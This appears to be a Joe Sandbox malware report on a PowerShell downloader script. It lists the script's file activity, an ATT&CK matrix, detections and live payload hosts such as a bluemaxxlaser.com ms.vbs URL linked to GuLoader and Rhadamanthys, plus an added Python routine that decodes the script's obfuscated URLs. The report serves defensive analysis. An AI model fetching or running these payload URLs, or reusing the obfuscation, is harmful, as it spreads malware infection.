      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0513~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Windows.StartLayout.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.Windows.StartLayout.Commands.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0012~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-UEV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\UEV\Microsoft.Uev.Commands.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Whea\Microsoft.Windows.Whea.WheaMemoryPolicy.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting\Microsoft.WindowsErrorReporting.PowerShell.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\WindowsSearch\Microsoft.WindowsSearch.Commands.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.WindowsSearch.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsSearch.Commands.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
MITRE ATT&CK Matrix (techniques listed per tactic column; a number before a technique is the count shown in the matrix cell)

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties
Resource Development: 1 Scripting; Domains; DNS Server; Virtual Private Server; Server; Botnet
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media
Execution: 1 PowerShell; Scheduled Task/Job; At; Cron; Launchd; Scheduled Task
Persistence: 1 Scripting; 1 Registry Run Keys / Startup Folder; 1 DLL Side-Loading; Login Hook; Network Logon Script; RC Scripts
Privilege Escalation: 11 Process Injection; 1 Registry Run Keys / Startup Folder; 1 DLL Side-Loading; Login Hook; Network Logon Script; RC Scripts
Defense Evasion: 1 Masquerading; 31 Virtualization/Sandbox Evasion; 11 Process Injection; 1 Obfuscated Files or Information; 1 DLL Side-Loading; Steganography
Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials
Discovery: 11 Security Software Discovery; 1 Process Discovery; 31 Virtualization/Sandbox Evasion; 1 Application Window Discovery; 2 File and Directory Discovery; 21 System Information Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC
Collection: 1 Archive Collected Data; Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture
Command and Control: 11 Encrypted Channel; 3 Ingress Tool Transfer; 3 Non-Application Layer Protocol; 4 Application Layer Protocol; Fallback Channels; Multiband Communication
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Encrypted for Impact; Data Destruction; Service Stop

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet
Behavior Graph ID: 1578229 | Sample: KcKtHBkskI.ps1 | Start date: 19/12/2024 | Architecture: WINDOWS | Score: 84

Top-level DNS/IP info: x1.i.lencr.org; www.bluemaxxlaser.com; 5 other IPs or domains
Top-level signatures: Antivirus / Scanner detection for submitted sample; Multi AV Scanner detection for submitted file; Yara detected Powershell download and execute; 3 other signatures

Process tree:
• powershell.exe 16 23 (started)
  • DNS/IP: www.bluemaxxlaser.com 203.175.174.69, 49703, 80 SGGS-AS-APSGGSSG Singapore
  • DNS/IP: astenterprises.com.pk 107.161.23.150, 443, 49701 RAMNODEUS United States
  • Signature: Powershell creates an autostart link
  • powershell.exe 20 (started)
    • Signature: Loading BitLocker PowerShell Module
  • Acrobat.exe 18 73 (started)
    • AcroCEF.exe 109 (started)
      • AcroCEF.exe (started)
  • conhost.exe (started)
• svchost.exe (started)
  • DNS/IP: 127.0.0.1 unknown unknown

Source | Detection | Scanner | Label | Link
KcKtHBkskI.ps1 | 37% | ReversingLabs | Script-PowerShell.Downloader.Boxter |
KcKtHBkskI.ps1 | 100% | Avira | TR/PShell.Dldr.VPA |
No Antivirus matches

Source | Detection | Scanner | Label | Link
https://www.astenterprises.com.pk/ms/List%20of%20required%20items%20and%20services.pdf | 0% | Avira URL Cloud | safe |
https://www.astenterprises.com.pk/ms/List | 0% | Avira URL Cloud | safe |
http://www.bluishmaxxlasishr.com/ms/ms.vbs | 0% | Avira URL Cloud | safe |
https://www.astishntishrprisishs.com.pk/ms/List%20of%20rishquirishd%20itishms%20and%20sishrvicishs.p | 0% | Avira URL Cloud | safe |
http://www.bluemaxxlaser.com/ms/ms.vbs | 0% | Avira URL Cloud | safe |
Name | IP | Active | Malicious | Antivirus Detection | Reputation
bg.microsoft.map.fastly.net | 199.232.214.172 | true | false | | high
astenterprises.com.pk | 107.161.23.150 | true | false | | high
www.bluemaxxlaser.com | 203.175.174.69 | true | false | | high
default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com | 217.20.58.100 | true | false | | high
x1.i.lencr.org | unknown | unknown | false | | high
www.astenterprises.com.pk | unknown | unknown | false | | high
Name | Malicious | Antivirus Detection | Reputation
http://www.bluemaxxlaser.com/ms/ms.vbs | false | Avira URL Cloud: safe | unknown
https://www.astenterprises.com.pk/ms/List%20of%20required%20items%20and%20services.pdf | false | Avira URL Cloud: safe | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
http://nuget.org/NuGet.exe | powershell.exe, 00000000.00000002.1505237210.0000019897D33000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1505237210.0000019897E76000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1310938319.000001FC472A4000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://x1.i.lencr.org/ | 2D85F72862B55C4EADD9E66E06947F3D0.12.dr | false | | high
https://aka.ms/winsvr-2022-pshelp | powershell.exe, 00000003.00000002.1291434839.000001FC37458000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1291434839.000001FC38858000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1291434839.000001FC3853D000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://www.astenterprises.com.pk/ms/List | powershell.exe, 00000000.00000002.1433403188.000001988939B000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://pesterbdd.com/images/Pester.png | powershell.exe, 00000003.00000002.1291434839.000001FC37458000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://schemas.xmlsoap.org/soap/encoding/ | powershell.exe, 00000003.00000002.1291434839.000001FC37458000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 00000003.00000002.1291434839.000001FC37458000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://go.micro | powershell.exe, 00000000.00000002.1433403188.00000198888F3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1291434839.000001FC38858000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1291434839.000001FC37C6C000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.microsoft.co | powershell.exe, 00000000.00000002.1514703596.00000198A0020000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://contoso.com/License | powershell.exe, 00000003.00000002.1310938319.000001FC472A4000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://contoso.com/Icon | powershell.exe, 00000003.00000002.1310938319.000001FC472A4000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://aka.ms/winsvr-2022-pshelpX | powershell.exe, 00000003.00000002.1291434839.000001FC38858000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://g.live.com/odclientsettings/ProdV21C: | svchost.exe, 0000000D.00000003.1390390863.00000226971A0000.00000004.00000800.00020000.00000000.sdmp, edb.log.13.dr, qmgr.db.13.dr | false | | high
http://go.micros | powershell.exe, 00000003.00000002.1291434839.000001FC37C6C000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://github.com/Pester/Pester | powershell.exe, 00000003.00000002.1291434839.000001FC37458000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.astenterprises.com.pk | powershell.exe, 00000000.00000002.1433403188.00000198897A3000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://www.adobe.co | ReaderMessages.11.dr | false | | high
http://astenterprises.com.pk | powershell.exe, 00000000.00000002.1433403188.00000198897A3000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.bluishmaxxlasishr.com/ms/ms.vbs | powershell.exe, 00000000.00000002.1433403188.0000019887EF3000.00000004.00000800.00020000.00000000.sdmp, KcKtHBkskI.ps1 | true | Avira URL Cloud: safe | unknown
https://g.live.com/odclientsettings/Prod1C: | qmgr.db.13.dr | false | | high
https://www.astenterprises.com.pk | powershell.exe, 00000000.00000002.1433403188.000001988939B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1433403188.000001988979F000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://schemas.xmlsoap.org/wsdl/ | powershell.exe, 00000003.00000002.1291434839.000001FC37458000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.bluemaxxlaser.com | powershell.exe, 00000000.00000002.1433403188.000001988983A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1433403188.00000198897DD000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://contoso.com/ | powershell.exe, 00000003.00000002.1310938319.000001FC472A4000.00000004.00000800.00020000.00000000.sdmp | false | | high
                                                              https://nuget.org/nuget.exepowershell.exe, 00000000.00000002.1505237210.0000019897D33000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1505237210.0000019897E76000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1310938319.000001FC472A4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                high
                                                                https://aka.ms/pscore68powershell.exe, 00000000.00000002.1433403188.0000019887CC1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1291434839.000001FC37231000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  high
                                                                  http://www.microsoft.cpowershell.exe, 00000003.00000002.1317161256.000001FC4F6A8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    high
                                                                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000000.00000002.1433403188.0000019887CC1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1291434839.000001FC37231000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      high
                                                                      https://www.astishntishrprisishs.com.pk/ms/List%20of%20rishquirishd%20itishms%20and%20sishrvicishs.ppowershell.exe, 00000000.00000002.1433403188.000001988939B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      unknown
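Two rows in the URL table stand out: www.bluishmaxxlasishr.com and www.astishntishrprisishs.com.pk both carry an Avira "safe" verdict and an "unknown" reputation, so URL reputation alone says nothing about them. Replacing every "ish" in those strings with "e" yields www.bluemaxxlaser.com and www.astenterprises.com.pk, the plaintext hosts listed elsewhere in this same table and in the contacted-IP table, and the decoded document name matches the decoy file name (List of required items and services.pdf) seen in the related-sample context below. The following is an added example, not code from the report or from the sample: the "ish" = "e" rule is an inference from the strings on this page (the script's own decoding routine is not shown), and the host and IP lists it checks against are copied from the report's tables.

```python
from urllib.parse import urlsplit, unquote

# Every URL string from the report's URL table, copied as found (several are
# fragments truncated in the memory dump they were recovered from).
REPORT_URLS = [
    "https://go.micro",
    "http://www.microsoft.co",
    "https://contoso.com/License",
    "https://contoso.com/Icon",
    "https://aka.ms/winsvr-2022-pshelpX",
    "https://g.live.com/odclientsettings/ProdV21C:",
    "http://go.micros",
    "https://github.com/Pester/Pester",
    "http://www.astenterprises.com.pk",
    "https://www.adobe.co",
    "http://astenterprises.com.pk",
    "http://www.bluishmaxxlasishr.com/ms/ms.vbs",
    "https://g.live.com/odclientsettings/Prod1C:",
    "https://www.astenterprises.com.pk",
    "http://schemas.xmlsoap.org/wsdl/",
    "http://www.bluemaxxlaser.com",
    "https://contoso.com/",
    "https://nuget.org/nuget.exe",
    "https://aka.ms/pscore68",
    "http://www.microsoft.c",
    "http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name",
    "https://www.astishntishrprisishs.com.pk/ms/List%20of%20rishquirishd%20itishms%20and%20sishrvicishs.p",
]

# Plaintext hosts from the report's URL table, and its contacted-IP table (domain -> IP).
KNOWN_HOSTS = {"www.bluemaxxlaser.com", "www.astenterprises.com.pk", "astenterprises.com.pk"}
REPORTED_IPS = {
    "www.bluemaxxlaser.com": "203.175.174.69",
    "astenterprises.com.pk": "107.161.23.150",
}

# Assumption: the substring "ish" stands in for the letter "e". Inferred from the two
# flagged URLs lining up with plaintext hosts elsewhere in the report; the report does
# not show the script's own decoding routine.
TOKEN, LETTER = "ish", "e"


def deobfuscate(s: str) -> str:
    return s.replace(TOKEN, LETTER)


def registered_host(host: str) -> str:
    # The IP table lists "astenterprises.com.pk" without the "www." prefix.
    return host[4:] if host.startswith("www.") else host


def ip_for(host: str):
    return REPORTED_IPS.get(host) or REPORTED_IPS.get(registered_host(host))


def find_obfuscated(urls, known_hosts):
    """Return records for URLs whose host is unknown as written but becomes a known
    host once decoded. Requiring the decoded host to be known is what keeps ordinary
    words that contain "ish" (finish, publish) from being rewritten."""
    hits = []
    for raw in urls:
        raw_host = urlsplit(raw).hostname or ""
        if TOKEN not in raw_host or raw_host in known_hosts:
            continue
        decoded = deobfuscate(raw)
        parts = urlsplit(decoded)
        host = parts.hostname or ""
        if host not in known_hosts:
            continue
        hits.append({
            "obfuscated": raw,
            "url": decoded,
            "host": host,
            "ip": ip_for(host),
            # Path is URL-decoded so the decoy document name is readable.
            "filename": unquote(parts.path.rsplit("/", 1)[-1]),
        })
    return hits


if __name__ == "__main__":
    for hit in find_obfuscated(REPORT_URLS, KNOWN_HOSTS):
        print(f'{hit["obfuscated"]}\n  -> {hit["url"]}  [{hit["host"]} = {hit["ip"]}]  file: {hit["filename"]!r}')
```

The decoded path of the second hit still ends in .p because the report itself truncates that string; the example does not complete it. In practice the "known host" set would come from the same report's DNS and IP tables or from network telemetry, which is what turns a blind string substitution into a check that only fires when the substitution produces something real.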
| IP | Domain | Country | ASN | ASN Name | Malicious |
|---|---|---|---|---|---|
| 203.175.174.69 | www.bluemaxxlaser.com | Singapore | 24482 | SGGS-AS-APSGGSSG | false |
| 107.161.23.150 | astenterprises.com.pk | United States | 3842 | RAMNODEUS | false |

Private IP: 127.0.0.1
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1578229
Start date and time: 2024-12-19 12:47:20 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 5m 31s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 23
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: KcKtHBkskI.ps1 (renamed because the original name is a hash value)
Original Sample Name: 7883e31a07c25e30851390471a8d97e172ec6ec1ec98f49813d166f71cb819a1.ps1
Detection: MAL
Classification: mal84.evad.winPS1@20/58@4/3
EGA Information: Failed
HCA Information:
• Successful, ratio: 83%
• Number of executed functions: 6
• Number of non-executed functions: 3
Cookbook Comments:
• Found application associated with file extension: .ps1
• Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
• Excluded IPs from analysis (whitelisted): 23.218.208.137, 52.6.155.20, 52.22.41.97, 3.219.243.226, 3.233.129.217, 162.159.61.3, 172.64.41.3, 217.20.58.100, 92.122.16.236, 23.32.239.56, 2.19.198.27, 23.195.61.56, 13.107.246.63, 172.202.163.200, 23.47.168.24
• Excluded domains from analysis (whitelisted): e4578.dscg.akamaiedge.net, chrome.cloudflare-dns.com, fs.microsoft.com, e8652.dscx.akamaiedge.net, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, acroipm2.adobe.com.edgesuite.net, ctldl.windowsupdate.com, time.windows.com, p13n.adobe.io, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, acroipm2.adobe.com, fe3cr.delivery.mp.microsoft.com, armmf.adobe.com, ssl-delivery.adobe.com.edgekey.net, e16604.g.akamaiedge.net, a122.dscd.akamai.net, geo2.adobe.com, prod.fs.microsoft.com.akadns.net, wu-b-net.trafficmanager.net, crl.root-x1.letsencrypt.org.edgekey.net
• Execution Graph export aborted for target powershell.exe, PID 7272 because it is empty
• Execution Graph export aborted for target powershell.exe, PID 7476 because it is empty
• Not all processes were analyzed; the report is missing behavior information
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size getting too big, too many NtCreateKey calls found.
• Report size getting too big, too many NtQueryAttributesFile calls found.
• Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
• VT rate limit hit for: KcKtHBkskI.ps1
| Time | Type | Description |
|---|---|---|
| 06:48:14 | API Interceptor | 69x Sleep call for process: powershell.exe modified |
| 06:48:27 | API Interceptor | 2x Sleep call for process: svchost.exe modified |
| 08:08:48 | API Interceptor | 2x Sleep call for process: AcroCEF.exe modified |
Context: IPs

| Match | Associated Sample Name / URL | Detection | Threat Name | Context |
|---|---|---|---|---|
| 203.175.174.69 | 8iAcoQLc3o.ps1 | malicious | Unknown | www.bluemaxxlaser.com/ms/ms.vbs |
| 203.175.174.69 | R7FBVcp1tf.ps1 | malicious | Unknown | www.bluemaxxlaser.com/ms/ms.vbs |
| 203.175.174.69 | 2rTi9MgX25.ps1 | malicious | Unknown | www.bluemaxxlaser.com/ms/ms.vbs |
| 203.175.174.69 | fs8cRx6Us2.ps1 | malicious | Unknown | www.bluemaxxlaser.com/rh/List%20of%20required%20items%20and%20services.pdf |
| 203.175.174.69 | ER4HMMzeQ3.ps1 | malicious | Unknown | www.bluemaxxlaser.com/rh/List%20of%20required%20items%20and%20services.pdf |
| 203.175.174.69 | FjfZ7uM8zh.lnk | malicious | Unknown | www.bluemaxxlaser.com/ms/ms.vbs |
| 203.175.174.69 | yswmdaREME.lnk | malicious | Unknown | www.bluemaxxlaser.com/ms/ms.vbs |
| 203.175.174.69 | 0bNBLjPn56.lnk | malicious | Unknown | www.bluemaxxlaser.com/ms/ms.vbs |
| 203.175.174.69 | 64Tgzu2FKh.exe | malicious | GuLoader, RHADAMANTHYS | bluemaxxlaser.com/rh/rheu.bin |
| 203.175.174.69 | zp.exe | malicious | GuLoader, RHADAMANTHYS | bluemaxxlaser.com/rh/rh.bin |
| 107.161.23.150 | 8iAcoQLc3o.ps1 | malicious | Unknown | |
| 107.161.23.150 | R7FBVcp1tf.ps1 | malicious | Unknown | |
| 107.161.23.150 | 2rTi9MgX25.ps1 | malicious | Unknown | |
| 107.161.23.150 | tmkSAOF3GM.vbs | malicious | GuLoader, RHADAMANTHYS | |
| 107.161.23.150 | FjfZ7uM8zh.lnk | malicious | Unknown | |
| 107.161.23.150 | yswmdaREME.lnk | malicious | Unknown | |
| 107.161.23.150 | 0bNBLjPn56.lnk | malicious | Unknown | |
| 107.161.23.150 | List of required items and services.pdf.vbs | malicious | GuLoader, RHADAMANTHYS | |
| 107.161.23.150 | List of required items pdf.vbs | malicious | GuLoader | |
| 107.161.23.150 | List of required items and services pdf.vbs | malicious | GuLoader | |

Context: Domains

| Match | Associated Sample Name / URL | Detection | Threat Name | Context |
|---|---|---|---|---|
| bg.microsoft.map.fastly.net | 8iAcoQLc3o.ps1 | malicious | Unknown | 199.232.214.172 |
| bg.microsoft.map.fastly.net | R7FBVcp1tf.ps1 | malicious | Unknown | 199.232.210.172 |
| bg.microsoft.map.fastly.net | 2rTi9MgX25.ps1 | malicious | Unknown | 199.232.210.172 |
| bg.microsoft.map.fastly.net | LFLtlBAuf7.exe | malicious | Quasar | 199.232.210.172 |
| bg.microsoft.map.fastly.net | FjfZ7uM8zh.lnk | malicious | Unknown | 199.232.210.172 |
| bg.microsoft.map.fastly.net | yswmdaREME.lnk | malicious | Unknown | 199.232.214.172 |
| bg.microsoft.map.fastly.net | 0bNBLjPn56.lnk | malicious | Unknown | 199.232.210.172 |
| bg.microsoft.map.fastly.net | Dix7g8PK1e.pdf | malicious | Unknown | 199.232.210.172 |
| bg.microsoft.map.fastly.net | CROC000400 .pdf | malicious | Unknown | 199.232.210.172 |
| bg.microsoft.map.fastly.net | contract_signed.pdf | malicious | Unknown | 199.232.214.172 |

Context: ASNs

| Match | Associated Sample Name / URL | Detection | Threat Name | Context |
|---|---|---|---|---|
| RAMNODEUS | 8iAcoQLc3o.ps1 | malicious | Unknown | 107.161.23.150 |
| RAMNODEUS | R7FBVcp1tf.ps1 | malicious | Unknown | 107.161.23.150 |
| RAMNODEUS | 2rTi9MgX25.ps1 | malicious | Unknown | 107.161.23.150 |
| RAMNODEUS | tmkSAOF3GM.vbs | malicious | GuLoader, RHADAMANTHYS | 107.161.23.150 |
| RAMNODEUS | FjfZ7uM8zh.lnk | malicious | Unknown | 107.161.23.150 |
| RAMNODEUS | yswmdaREME.lnk | malicious | Unknown | 107.161.23.150 |
| RAMNODEUS | 0bNBLjPn56.lnk | malicious | Unknown | 107.161.23.150 |
| RAMNODEUS | List of required items and services.pdf.vbs | malicious | GuLoader, RHADAMANTHYS | 107.161.23.150 |
| RAMNODEUS | List of required items pdf.vbs | malicious | GuLoader | 107.161.23.150 |
| RAMNODEUS | List of required items and services pdf.vbs | malicious | GuLoader | 107.161.23.150 |
| SGGS-AS-APSGGSSG | 8iAcoQLc3o.ps1 | malicious | Unknown | 203.175.174.69 |
| SGGS-AS-APSGGSSG | R7FBVcp1tf.ps1 | malicious | Unknown | 203.175.174.69 |
| SGGS-AS-APSGGSSG | 2rTi9MgX25.ps1 | malicious | Unknown | 203.175.174.69 |
| SGGS-AS-APSGGSSG | fs8cRx6Us2.ps1 | malicious | Unknown | 203.175.174.69 |
| SGGS-AS-APSGGSSG | ER4HMMzeQ3.ps1 | malicious | Unknown | 203.175.174.69 |
| SGGS-AS-APSGGSSG | FjfZ7uM8zh.lnk | malicious | Unknown | 203.175.174.69 |
| SGGS-AS-APSGGSSG | yswmdaREME.lnk | malicious | Unknown | 203.175.174.69 |
| SGGS-AS-APSGGSSG | 0bNBLjPn56.lnk | malicious | Unknown | 203.175.174.69 |
